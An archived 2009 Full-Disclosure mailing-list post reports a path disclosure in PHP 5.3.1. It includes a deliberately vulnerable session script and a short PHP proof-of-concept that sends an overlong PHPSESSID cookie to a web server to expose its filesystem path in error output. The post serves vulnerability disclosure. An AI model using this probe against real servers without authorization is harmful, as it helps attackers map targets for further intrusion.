[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Path disclosure in PHP 5.3.1

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Path disclosure in PHP 5.3.1
From: WHK <www.kernel32@xxxxxxxxx>
Date: Sun, 27 Dec 2009 02:48:29 -0300

Make a script vulnerable:
<?php
session_start();
if($_SESSION)
  echo $_SESSION;
else
  $_SESSION = 'xx';
?>

Now look the script in you explorer and change the value of cookie 
"PHPSESSID" to 300 chars "a" and look the disclosure:
Warning: session_start() [function.session-start]: 
open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php 
on line 3

PoC:
<?php
error_reporting(0);

$payload =
'GET / HTTP/1.1
Host: 127.0.0.1
Connection: close
Cookie: PHPSESSID='.str_repeat('a', 500).';

';

if(!$handle = fsockopen('127.0.0.1', 80)){
  die('Error');
}else{
  fputs($handle, $payload);
  while(!feof($handle)){
   $retorno .= fread($handle, 1024);
  }
  echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
}
?>

if value of cookie is "aaaaaaa" then file in temp of server is 
"sess_aaaaaaa", if value of cookie is ax300 dont make file and return 
the error message.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Path disclosure in PHP 5.3.1
  - From: Jeff Williams

Prev by Date: [Full-disclosure] [ MDVSA-2009:342 ] acpid
Next by Date: Re: [Full-disclosure] Path disclosure in PHP 5.3.1
Previous by thread: [Full-disclosure] [ MDVSA-2009:342 ] acpid
Next by thread: Re: [Full-disclosure] Path disclosure in PHP 5.3.1
Index(es):
- Date
- Thread